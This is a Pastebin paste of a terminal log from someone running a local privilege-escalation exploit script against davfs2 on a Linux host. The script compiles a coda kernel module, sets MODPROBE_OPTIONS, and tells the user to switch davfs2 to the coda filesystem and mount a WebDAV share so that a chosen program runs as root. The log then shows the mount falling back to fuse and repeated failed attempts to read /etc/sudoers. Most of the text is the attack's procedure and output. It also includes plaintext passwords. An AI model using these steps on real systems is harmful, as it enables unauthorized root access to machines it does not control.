Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- davtest@humble:/tmp$ ./exploit.sh
- ./exploit.sh
- #######################################
- Specify the full path of the kernel module which you want to load
- Leave empty if you wish to compile it now
- Understand that you need kernel headers, make and gcc for successful compilation
- #######################################
- make -C /lib/modules/3.2.0-4-686-pae/build M=/tmp modules
- make[1]: Entering directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- CC [M] /tmp/coda.o
- Building modules, stage 2.
- MODPOST 1 modules
- CC /tmp/coda.mod.o
- LD [M] /tmp/coda.ko
- make[1]: Leaving directory `/usr/src/linux-headers-3.2.0-4-686-pae'
- #######################################
- Copying the modules in use for the running kernel in the local directory
- #######################################
- #######################################
- Copying coda.ko module
- #######################################
- #######################################
- Setting the 'modules.dep' and running depmod
- #######################################
- #######################################
- Specify the user-mode ELF which you whish to copy in /tmp/rootprog that will be run as root. Default value is /tmp/rootprog
- WARNING !!!!!!!! YOU HAVE ONLY 1 SHOT !!!!! unmounting webdav partitions doesn't unload the coda.ko module
- #######################################
- /tmp/root.sh
- /tmp/root.sh
- #######################################
- Setting MODPROBE_OPTIONS variable
- #######################################
- #######################################
- Now, check the the /home/davtest/.davfs2/davfs.conf. Modify the default value of 'kernel_fs' to coda eg:
- # General Options
- # ---------------
- # dav_user davfs2 # system wide config file only
- # dav_group davfs2 # system wide config file only
- # ignore_home # system wide config file only
- kernel_fs coda
- # buf_size 16 # KiByte
- #######################################
- #######################################
- Then, check /etc/fstab for remote webdav servers which the user can mount, eg:
- https://www.crushftp.com/demo/ /home/foo/dav davfs noauto,user 0 0
- #######################################
- #######################################
- If the remote webdav is authenticated, ensure to have valid credentials. The run 'mount /home/foo/dav' inside this terminal'
- #######################################
- davtest@humble:/tmp$ mount /home/davtest/dav
- mount /home/davtest/dav
- Please enter the username to authenticate with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Username: test
- test
- Please enter the password to authenticate user test with server
- http://127.0.0.1/webdav/ or hit enter for none.
- Password: rooted
- /sbin/mount.davfs: no free coda device to mount
- /sbin/mount.davfs: trying fuse kernel file system
- /sbin/mount.davfs: fuse device opened successfully
- davtest@humble:/tmp$ cat /etc/suoders
- cat /etc/suoders
- cat: /etc/suoders: No such file or directory
- davtest@humble:/tmp$ cat /etc/sudoers
- cat /etc/sudoers
- cat: /etc/sudoers: Permission denied
- davtest@humble:/tmp$ exit
- exit
- exit
- davtest@humble:/tmp$ exit
- exit
- exit
- $ whoami
- davtest
- $ su davtest
- Password: davtest
- sh: 0: can't access tty; job control turned off
- $ cat /etc/sudoers
- cat: /etc/sudoers: Permission denied
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
